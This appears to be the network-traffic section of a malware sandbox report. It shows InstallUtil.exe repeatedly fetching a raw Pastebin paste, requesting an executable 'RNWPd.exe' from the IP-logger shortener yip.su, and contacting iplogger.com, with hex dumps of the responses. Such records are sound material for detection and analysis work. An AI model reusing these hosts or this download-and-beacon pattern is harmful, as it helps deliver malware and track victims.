Aug 9, 2024 23:00:52.592073917 CEST | 1.1.1.1 | 192.168.2.6 | 0x2aaf | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:52.592073917 CEST | 1.1.1.1 | 192.168.2.6 | 0x2aaf | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:53.412178040 CEST | 1.1.1.1 | 192.168.2.6 | 0x542f | No error (0) | yip.su | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:53.412178040 CEST | 1.1.1.1 | 192.168.2.6 | 0x542f | No error (0) | yip.su | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:58.416543007 CEST | 1.1.1.1 | 192.168.2.6 | 0xe83d | No error (0) | iplogger.com | | 172.67.188.178 | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:58.416543007 CEST | 1.1.1.1 | 192.168.2.6 | 0xe83d | No error (0) | iplogger.com | | 104.21.76.57 | A (IP address) | IN (0x0001) | false
                                                • pastebin.com
                                                • yip.su
                                                • iplogger.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-09 21:00:53 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
2024-08-09 21:00:53 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:00:53 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aada0a95043a6-EWR
2024-08-09 21:00:53 UTC | 1147 | IN | Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-09 21:00:53 UTC | 1369 | IN | Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-09 21:00:53 UTC | 1369 | IN | Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-09 21:00:53 UTC | 529 | IN | Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-09 21:00:53 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49722 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-09 21:00:53 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
2024-08-09 21:00:54 UTC | 906 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:00:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:00:54 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:00:54 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B0SJpbrQOjHIiis0Uaa5o2Fg12o74c%2FLav%2FiY4XbJXIjArAujGMtBT%2FTZIFPxqX7dNHcBnwdvVZZChN%2Fu7RBK6oiAnHoirHiqePvLF1dkXxwRx%2FAhLol74I%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aada54b8972b6-EWR
                                                alt-svc: h3=":443"; ma=86400
2024-08-09 21:00:54 UTC | 463 | IN | Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-08-09 21:00:54 UTC | 1369 | IN | Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
2024-08-09 21:00:54 UTC | 1369 | IN | Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
2024-08-09 21:00:54 UTC | 1369 | IN |
                                                Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                                                2024-08-09 21:00:54 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                                                Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                                                2024-08-09 21:00:54 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:00:54 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:00:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.6 | 49723 | 172.67.188.178 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:00:58 UTC | 68 | OUT | GET /1djqU4 HTTP/1.1
                                                Host: iplogger.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:00:59 UTC | 1285 | IN | HTTP/1.1 403 Forbidden
                                                Date: Fri, 09 Aug 2024 21:00:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Cross-Origin-Embedder-Policy: require-corp
                                                Cross-Origin-Opener-Policy: same-origin
                                                Cross-Origin-Resource-Policy: same-origin
                                                Origin-Agent-Cluster: ?1
                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                Referrer-Policy: same-origin
                                                X-Content-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                cf-mitigated: challenge


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.6 | 49724 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:00:59 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:00:59 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:00:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aadca7d79c332-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.6 | 49725 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:00 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:00 UTC | 900 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:00 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:00 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2FgNGfyPfVnEcrCcvXmoArTXBgmU1FVRtLU4z%2BWsAcfusoDzdbxcd5D5pKNHTx2Iauzx9TFdJyhdf6sMeHXjmPo8tdrUIXB7IbjP4i%2BPKFXtVRIdkIW0S1A%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aadcfaa99c466-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                                                2024-08-09 21:01:00 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                                                Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                                                2024-08-09 21:01:00 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.6 | 49727 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:05 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:05 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aadef98f1728d-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.6 | 49728 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:06 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:06 UTC | 898 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:06 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhPuneKNN1AF9soudF8QZ7V47kXPt84eiUO%2FrLBM3mP5%2BXiRAEmWKlJT6Otjm1VEgmSJkH2VbHvZfxG7vbdlNu3TkCa0bW2Xa7UHotzdOI50o1mKDLlkXII%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aadf3e9c9c461-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.6 | 49729 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:11 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:11 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae13ed244378-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.6 | 49730 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:12 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:12 UTC | 902 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:12 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:12 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r0yq9wGizc1cbFJUfgKz1uRCcyfl4Citexwr00jKLv1OE1Sd3xS5d%2B%2FySRxXYfVZ0MHovdxlXZ%2BxfPE%2BXLp50xHBoGelTu4XTAkYHJDRT4upPSNU5BwrNw%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae17fbac43e0-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;borde
                                                2024-08-09 21:01:12 UTC1369INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64
                                                Data Ascii: px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id
                                                2024-08-09 21:01:12 UTC158INData Raw: 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: tyle.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.6 | 49731 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:17 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:17 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae39bb190f65-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.6 | 49732 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:18 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:18 UTC | 904 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:18 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:18 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LeXTNp%2B6Ku7FytX0ghOAulLWuy0CRc%2BpoNSFkpYDKDT%2BUdvmnvJJ3kYt%2BXKPnSjcfj76gBP%2F2BKRARTHmNJfrFE9vp9LpWi1bYQ7CRnoUeU1mAPF8b8hg8A%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae3de8f24314-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.6 | 49733 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:23 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:23 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aae5dffc08c63-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.6 | 49734 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:01:24 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:24 UTC | 900 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:24 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:24 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZYm59YX%2BhAAieGMRvJ1M%2BLx%2B4Cpj33EqclyynurfFy94Vo18a1KEo6guvrkMsffnxozye1dXdpPYggDT41yDJbIsPcPenzlFoAy6POJmMcgMRhCe5NUoFU%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aae6218978cdd-EWR
                                                alt-svc: h3=":443"; ma=86400
